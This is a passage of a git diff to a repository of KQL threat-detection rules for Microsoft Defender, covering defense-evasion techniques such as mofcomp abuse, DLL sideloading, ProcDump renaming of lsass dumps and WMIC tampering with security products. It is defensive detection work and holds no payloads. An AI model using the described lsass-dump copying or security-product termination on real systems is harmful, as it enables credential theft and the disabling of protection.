+DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\Appx*") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql
index f196d95c..46e88abb 100644
--- a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql
+++ b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql
@@ -1,12 +1,12 @@
-// Title: Potential Suspicious Mofcomp Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-12
-// Level: high
-// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
-// The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
-// Attackers abuse this utility to install malicious MOF scripts
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: Potential Suspicious Mofcomp Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
+// The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
+// Attackers abuse this utility to install malicious MOF scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents | where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql
index 04bb8eee..aa27fb56 100644
--- a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql
+++ b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql
@@ -1,13 +1,13 @@
-// Title: Potential Suspicious Windows Feature Enabled - ProcCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-29
-// Level: medium
-// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
-// Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Legitimate usage of the features listed in the rule.
-
-DeviceProcessEvents
+// Title: Potential Suspicious Windows Feature Enabled - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-29
+// Level: medium
+// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
+// Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of the features listed in the rule.
+
+DeviceProcessEvents | where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql b/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql
index b1432564..492cefa5 100644
--- a/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql
+++ b/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql
@@ -1,12 +1,12 @@
-// Title: Potential SysInternals ProcDump Evasion
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-01-11
-// Level: high
-// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
-// False Positives:
-// - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming
-
-DeviceProcessEvents
+// Title: Potential SysInternals ProcDump Evasion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming
+
+DeviceProcessEvents | where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql
index c953acae..c1aa955e 100644
--- a/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql
+++ b/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql
@@ -1,12 +1,12 @@
-// Title: Potential System DLL Sideloading From Non System Locations
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Legitimate applications loading their own versions of the DLLs mentioned in this rule
-
-DeviceImageLoadEvents
+// Title: Potential System DLL Sideloading From Non System Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-14
+// Level: high
+// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLLs mentioned in this rule
+
+DeviceImageLoadEvents | where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith 
"\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith 
"\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith 
"\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath 
endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith 
"\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith 
"\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith 
"\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith 
"\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith 
"\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\")))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program 
Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql b/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql
index 6e2f0e2b..384b51d3 100644
--- a/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql
+++ b/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql
@@ -1,12 +1,12 @@
-// Title: Potential Tampering With Security Products Via WMIC
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-01-30
-// Level: high
-// Description: Detects uninstallation or termination of security products using the WMIC utility
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate administration
-
-DeviceProcessEvents
+// Title: Potential Tampering With Security Products Via WMIC
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-01-30
+// Level: high
+// Description: Detects uninstallation or termination of security products using the WMIC utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administration
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or 
